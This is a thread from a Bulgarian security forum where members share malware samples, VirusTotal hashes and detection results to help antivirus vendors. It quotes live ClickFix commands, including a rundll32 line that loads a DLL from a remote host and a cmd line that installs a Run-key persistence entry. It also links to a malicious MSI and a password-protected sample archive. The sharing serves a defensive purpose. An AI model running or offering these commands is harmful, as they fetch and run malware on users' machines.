Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

 

Подпомагане на АВ програмите с дефиниции, откриване на нови заплахи - част 18

Featured Replies

SEP 14 остави това https://www.virustotal.com/gui/file/0ef3b11323e22db7ff106edb65a0227507dc5c6cf8003fce198b2f4da392e34f

  • Отговори 8,8k
  • Прегледи 603k
  • Създадено
  • Последен отговор

Потребители с най-много отговори

Най-популярни публикации

  • Каква ползва от него тогава, като мълчи като риба? Само за красота и да товари системата ли?

  • tigertron
    tigertron

    При мен пък на тестовата машина с Windows XP SP3 и MS NetFreamwork 4 не иска да се стартира. Явно и вирусите спират поддръжката на XP 

  • Този е за пращане : http://dox.bg/files/dw?a=9f58b3c1f9 https://www.virustotal.com/bg/file/2ee50fd5c9f67e8814142de2009ec4234ee19dec1d4e9189ac5f45c359ed20eb/analysis/1482744276/    

Публикувани изображения

преди 19 минути, attj написа:

Злонамерен сайт ли е този https://www.game-game.com.ua/198731/ Реновираният SEP 14.4 така го класифицира и блокира достъп.

Bitdefender си мълчи...

преди 31 минути, attj написа:

Злонамерен сайт ли е този https://www.game-game.com.ua/198731/ Реновираният SEP 14.4 така го класифицира и блокира достъп.

Kasperky мълчи.

Malware analysis https://www.game-game.com.ua/198731/ No threats detected | ANY.RUN - Malware Sandbox Online

VirusTotal - URL

Няма заплахи и според 360 TS и Crowdstrike falcon. Симантек сега така класифицира и блокира много сайтове с торенти, онлайн-филми и игри. Преди не бе така. Реновираната корпоративна версия за пръв път е напът да изпадне от моите предпочитани. Борбата за авторските права не следва да се смесва с компютърната защита. Различни неща са.

Няма да ползвам Симантек и Касперски -заради ненужното пресилено класифициране на сайтове с торенти, онлайнфилми и игри. Микрософт не арестува само това - при стартиране следва незабавно блокиране от автосандбокса на стената на Комодо https://www.virustotal.com/gui/file/16aa1ccfd99b90ee17e5e676b6927e8d3eac06fa2c0cefd0f84e4cb9f6b744a5

преди 13 минути, attj написа:

Няма да ползвам Симантек и Касперски -заради ненужното пресилено класифициране на сайтове с торенти, онлайнфилми и игри. Микрософт не арестува само това - при стартиране следва незабавно блокиране от автосандбокса на стената на Комодо https://www.virustotal.com/gui/file/16aa1ccfd99b90ee17e5e676b6927e8d3eac06fa2c0cefd0f84e4cb9f6b744a5

Аз вече съм коментирал, че само сканирам. При стартиране предполагам, че ще има друг резултат.

преди 10 минути, parmobil написа:

Аз вече съм коментирал, че само сканирам. При стартиране предполагам, че ще има друг резултат.

Може да хване още нещо. Обаче без хипс и автосандбокс липсва доподсигуряване.

преди 5 минути, parmobil написа:

Хипс има, пясъчник няма.

Свикнах да имам и двете безплатно. Може и сдвоено - при сложната комбинация на Кихчо с Варанчо. Там може и дори с изключен антивирус. Сега съм с Микрософт. И с тях се шегувам и получавам фишингимейли за финансови награди.

Зловреден DLL пратен на пратен на MBAM. Пропуснат от Kaspersky според VT.

https://www.virustotal.com/gui/file/ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b/detection

@nikssi можеш ли да им го пратиш?

Идва от FakeCaptcha (ClickFix) команда: Да не се стартира от начинаещи, ако четат темата!!!

"rundll32.exe \realfact3.kymle9rax.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1"
преди 4 часа, B-boy/StyLe/ написа:

Зловреден DLL пратен на пратен на MBAM. Пропуснат от Kaspersky според VT.

https://www.virustotal.com/gui/file/ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b/detection

@nikssi можеш ли да им го пратиш?

Идва от FakeCaptcha (ClickFix) команда: Да не се стартира от начинаещи, ако четат темата!!!

"rundll32.exe \realfact3.kymle9rax.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1"

Пратен.

пп. Няма друг такъв бъгав форум. Три пъти отказва да покаже изображението. Показва долу в поста ,че е прикачен ама не се вижда в поста.

Редактирано от nikssi (преглед на промените)

преди 9 минути, nikssi написа:

Пратен.

пп. Няма друг такъв бъгав форум. Три пъти отказва да покаже изображението. Показва долу в поста ,че е прикачен ама не се вижда в поста.

Аз още не мога да пействам като хората...ама не само тук, ами и в malwarebytes форума. Те са със същата последна версия на форума. Или проблема е мен, щом не мога на 2 места с лисицата де пействам или е във форума, защото версията е 1:1 с тази тук. Навсякъде другаде мога...

преди 24 минути, B-boy/StyLe/ написа:

Аз още не мога да пействам като хората...ама не само тук, ами и в malwarebytes форума. Те са със същата последна версия на форума. Или проблема е мен, щом не мога на 2 места с лисицата де пействам или е във форума, защото версията е 1:1 с тази тук. Навсякъде другаде мога...

Вчера нямаше проблем с качване на картинки обаче днес ... хич не ми се разправя в темата с проблеми във форума. Ако имаше преглед преди да пусна поста нямааше заради една картинка да го редактирам три пъти. Да се оправят.

Редактирано от nikssi (преглед на промените)

  • Kalin Karaboychev премахна от закачени това тема
на 22.04.2026 г. в 11:56, B-boy/StyLe/ написа:

Зловреден DLL пратен на пратен на MBAM. Пропуснат от Kaspersky според VT.

https://www.virustotal.com/gui/file/ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b/detection

@nikssi можеш ли да им го пратиш?

Идва от FakeCaptcha (ClickFix) команда: Да не се стартира от начинаещи, ако четат темата!!!

"rundll32.exe \realfact3.kymle9rax.in.net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1"

VirusTotal - File - ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4954f37e659bd48b

Отчет — ac1e9e835a16b8827b3feb6dd9202acb1349a3b87fe3066b4... — Kaspersky Threat Intelligence Portal

image.png

Редактирано от nikssi (преглед на промените)

преди 17 минути, Лудият Учен написа:

https://www.upload.ee/files/19277995/Malware_.rar.html

6 зловредни файла...Password : infected

Kaspersky - 5/6

Остатък: VirusTotal - File - a7dfe696c8c5b2c0fe8ac4d525e0fe13173af727204a0727a4014199c64bab11

Микрософт само това последното а7..... не арестува. При стартиране е незабавно блокирано от автосандбокса на Комодо.

преди 29 минути, nikssi написа:

Интересна гад. Използва в описанието си Revo.

cmd.exe /c start "" "C:\Users\<USER>\Pictures\UcdvKcLRHk5Q\zyUEMcUzcH7D.exe" & reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft Revo Health" /t REG_SZ /d "C:\Users\<USER>\Pictures\UcdvKcLRHk5Q\Microsoft Teams Revo Helper khy3O.exe" & start "" "C:\Users\<USER>\Pictures\UcdvKcLRHk5Q\Microsoft Teams Revo Helper khy3O.exe"

Още един зловреден MSI:

http://85[.]11[.]161[.]198[:]6600/qffww8ph/DTYOKUEN.msi"

https://www.virustotal.com/gui/file/c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728/detection

преди 2 минути, attj написа:

Би Бой с изключен автосандбокс ли пробва ?

Кое да съм пробвал? Не съм пробвал, Тоше, има си виртуални пясъчници вече (за първия файл ако говориш).

А втория е пресен от нова ClickFix (FakeCaptcha) кампания. Един потребител му направи Deobfuscation, защото линка беше нарочно "усложнен". Но засичането, както се вижда не е добро.

Добавете отговор

Можете да публикувате отговор сега и да се регистрирате по-късно. Ако имате регистрация, влезте в профила си за да публикувате от него.

Гост
Публикацията ви съдържа термини, които не допускаме! Моля, редактирайте съдържанието си и премахнете подчертаните думи по-долу. Ако замените букви от думата със звездички или друго, за да заобиколите това предупреждение, профилът ви ще бъде блокиран и наказан!
Напишете отговор в тази тема...

Разглеждащи това в момента 0

  • Няма регистрирани потребители разглеждащи тази страница.

Дарение

  • Подкрепи съществуването на форума - направи дарение
    25%
    Дарени 252.69 EUR от нужните 1,000.00 EUR

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.